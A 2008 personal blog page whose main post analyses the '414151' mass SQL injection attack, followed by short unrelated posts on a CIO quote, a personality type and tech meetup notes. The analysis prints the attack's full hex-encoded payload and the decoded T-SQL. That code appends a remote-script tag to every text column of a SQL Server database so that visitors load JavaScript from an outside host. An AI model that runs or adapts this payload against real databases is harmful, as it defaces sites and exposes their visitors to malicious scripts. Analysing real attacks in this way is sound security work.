Barry Goldberg

SQL Injection is cool

April 18th, 2008

Overview

So seeing sites hacked is pretty cool unless it’s one of yours. I kinda look at hacking as the end-all-be-all of elite programming. Of course, the intent isn’t always good, but the techniques are artful. I most recently witnessed an impressive SQL Injection hack on a website. I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack" which appears to be the same code just implemented a little differently. Of course anyone who has been hacked by this code will recognize these numbers. As far as SQL Injection attacks go this one seems to have taken a similar systematic approach. I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that. I will list some references at the end.

The Details

There were a couple things that impressed me about this particular hack.

The outcome was that the hack code inserted a <script> tag with a reference url into every varchar column in the database. The site was running .Net, IIS with SQL Server 2000. I mention the technology because the script assumes SQL Server. That said, don’t fool yourself to think that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices. Specifically inline or free SQL statements within code and could occur on any (most) platform, language or database. The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve. It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
The second thing that impressed me was the actual code that executed this varchar manipulation. It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.

The Possibilities

The possibilities of this hack scare me (and impress me). When I started searching around the web for this 414151 script I found a good number of references. Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also. I list one link below of an article that talks about it quite a lot. According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.

It is quite frightening when you think of such an effective and widespread hack that basically is designed to "phone home" and execute some unknown Javascript anytime the author decides to turn on his website (synchronized attack scenario) ….well…I think it would have made the news.

The Javascript

<script src=http://www.414151.com/fjp.js></script>

The Hexadecimal

4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200

The SQL Statement


DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor 

CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b 

where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or 

b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM 

 Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN 

exec(’update [’+@T+’] set [’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+

”<script src=http://www.414151.com/fjp.js></script>”’)FETCH NEXT 

FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Other references

http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html - this great article dives deep into the general attack.
http://www.webhostingtalk.com/showthread.php?t=686032
http://en.wikipedia.org/wiki/SQL_injection
http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Update (4/29)…

This one keeps going and going.

http://hackademix.net/2008/04/26/mass-attack-faq/#comment-7742 - another great article talking about this specific attack
http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/
http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_1.html

I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks. I didn’t mention this earlier because this is inherent in all SQL Injection attacks.

Posted by Barry | Filed in soul | Comment now »

Good quote from CIO mag

April 17th, 2008

Any IT organization that’s willing to do without training, innovation, process improvements, client relationship building and other "keep-the-business-viable" activities is only postponing its inevitable demise.

Posted by Barry | Filed in soul | Comment now »

ENFJ

March 24th, 2008

Guess who is?

Of all the general personality types, ENFJ’s are the most outgoing and friendly. Their chief concern in life is other people, and fostering harmony and cooperation, between themselves and others. They are more than willing to do your share in relationships. They try, always, to be friendly, sympathetic, cooperative and tactful.

They have strong ideals and a potent sense of loyalty, whether to an employer, a school, a hometown, or a favourite cause. One thing is certain: they do tend to idealize the people and things they value, and they like to be held in similarly high esteem.

They are a judging type, and disorganized situations strike them as chaotic. They are distinctly uncomfortable when they’re obliged to function without a schedule, a plan, or a clear idea of the objectives to be achieved.

If need be, they’ll provide the necessary direction, but they don’t insist on setting all the rules themselves. They accept authority.

They’re patient and conscientious. They make a concerted effort to stick to a job until it’s finished, and they believe it’s important to pay attention to detail. Perhaps more significantly, they base their personal habits on a feeling of obligation to the task, their profession, their friends, family and co-workers, or to the institution itself.

They don’t mind letting others know what their values are, and-given the authority-they may insist that others follow their code and their standards.

The combination of feeling and judgment is also the fertile soil upon which righteous indignation flowers. They may find it helpful to temper their strong feeling with a less emotional thinking approach to judgment and to balance their judgment with more open-minded perception.

Posted by Barry | Filed in us | Comment now »

First Post - Welcome

February 29th, 2008

Came time that I needed a presence. I used to redo my website every year, sometimes everys six months. Well, it has been a while but lately I feel the necessity to jump back in. Through WordPress I can get things off and running and the thought was I would spend my time creating content instead of design but then it took me two days to pick a theme that someone else made. Best intentions I guess. Thanks for visiting.

Posted by Barry | Filed in network | Comment now »

New York Tech Meetup on 1/8/2008

January 8th, 2008

My Notes:

GoMoBo.com
- EZ Pass in restaurants
- Pretty kewl site; but for my every day it wont help me.

Tagiton.com
- I don’t get it.
- 6 degrees of separation communication
- Seems spammy

Gilt.com
- W00t for women
- Not great
- Membership based sales

Im in like with you
- Blockles - they totally stole this from networked Tetris
- Ruby, AS3/Flash
- Kewl app

First
- Commercial
- Robots

TableXchange
- I am torn on this one. I tried to use it but of course nothing available at any restaurant I wanted to eat at when I wanted it. I think it should have an RSS feed so I can see on any day what is available without visiting their site.

Posted by Barry | Filed in network, soul | Comment now »